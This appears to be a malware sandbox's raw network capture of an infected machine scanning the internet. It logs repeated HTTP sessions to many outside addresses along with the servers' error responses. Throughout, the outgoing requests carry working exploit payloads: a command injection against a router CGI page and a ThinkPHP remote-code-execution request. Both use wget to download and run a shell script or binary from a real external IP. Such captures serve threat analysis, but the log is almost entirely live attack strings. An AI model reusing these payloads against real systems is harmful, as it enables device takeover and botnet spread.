                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 35 62 39 31 33 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 35 36 26 23 34 36 3b 64 37 63 30 65 30 62 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 32 35 62 39 31 33 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 35 36 26 23 34 36 3b 64 37 63 30 65 30 62 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;25b91302&#46;1713105356&#46;d7c0e0b<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;25b91302&#46;1713105356&#46;d7c0e0b</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        375192.168.2.233325662.150.41.1148080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:57.038584948 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:57.446316004 CEST313INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        376192.168.2.234959295.128.203.3980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:57.059114933 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:57.376462936 CEST467INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:52 GMT
                                                        Server: Apache
                                                        Content-Length: 289
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 39 35 2e 31 32 38 2e 32 30 33 2e 33 39 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at 95.128.203.39 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        377192.168.2.235933295.31.211.3680
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:57.071302891 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:57.413546085 CEST113INHTTP/1.1 400 Bad Request
                                                        Connection: close
                                                        Content-Type: text/plain
                                                        Transfer-Encoding: chunked
                                                        Apr 14, 2024 16:35:57.414176941 CEST33INData Raw: 42 0d 0a 42 61 64 20 52 65 71 75 65 73 74 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: BBad Request0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        378192.168.2.235634095.86.88.21780
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:57.083455086 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        379192.168.2.2353404112.223.134.18980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:57.338114023 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:57.630232096 CEST839INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:35:57 GMT
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Length: 675
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 30 64 30 64 30 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 20 7d 0a 64 69 76 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 38 66 38 66 38 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 34 70 78 3b 20 77 69 64 74 68 3a 35 30 30 70 78 3b 20 6d 61 72 67 69 6e 3a 31 30 30 70 78 20 61 75 74 6f 20 30 3b 20 70 61 64 64 69 6e 67 3a 35 30 70 78 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 30 70 78 3b 20 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 38 30 38 30 38 30 3b 20 62 6f 78 2d 73 68 61 64 6f 77 3a 38 70 78 20 31 35 70 78 20 32 30 70 78 20 23 34 30 34 30 34 30 20 7d 0a 68 31 20 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 20 7d 0a 70 20 7b 20 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 32 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 36 30 36 30 36 30 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 61 30 61 30 66 66 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 72 69 67 68 74 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 34 30 30 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><title>400 - Bad Request</title><style type="text/css">body { background-color:#d0d0d0; font-family:sans-serif }div { background-color:#f8f8f8; letter-spacing:4px; width:500px; margin:100px auto 0; padding:50px; border-radius:10px; border:1px solid #808080; box-shadow:8px 15px 20px #404040 }h1 { margin:0; font-size:22px; font-weight:normal }p { margin:10px 0 0 0; padding-top:2px; font-size:14px; color:#606060; border-top:1px solid #a0a0ff; text-align:right; font-weight:bold }</style></head><body><div><h1>Bad Request</h1><p>400</p></div></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        380192.168.2.235567894.122.28.688080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:57.351952076 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        381192.168.2.235757294.122.208.518080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:57.355087996 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        382192.168.2.234617694.123.99.258080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:57.355671883 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        383192.168.2.233341494.121.79.318080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:57.358578920 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        384192.168.2.235898085.133.151.698080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:57.701082945 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:58.071964979 CEST113INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 14:35:57 GMT
                                                        Content-Length: 0
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        385192.168.2.234866431.136.94.388080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:58.402352095 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:59.357445955 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:01.277246952 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:05.308828115 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:12.987664938 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:28.345494986 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:59.829090118 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        386192.168.2.234744231.136.53.1518080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:58.407083988 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:59.389659882 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:01.309314966 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:05.308739901 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:12.987660885 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:28.345374107 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:59.829180002 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
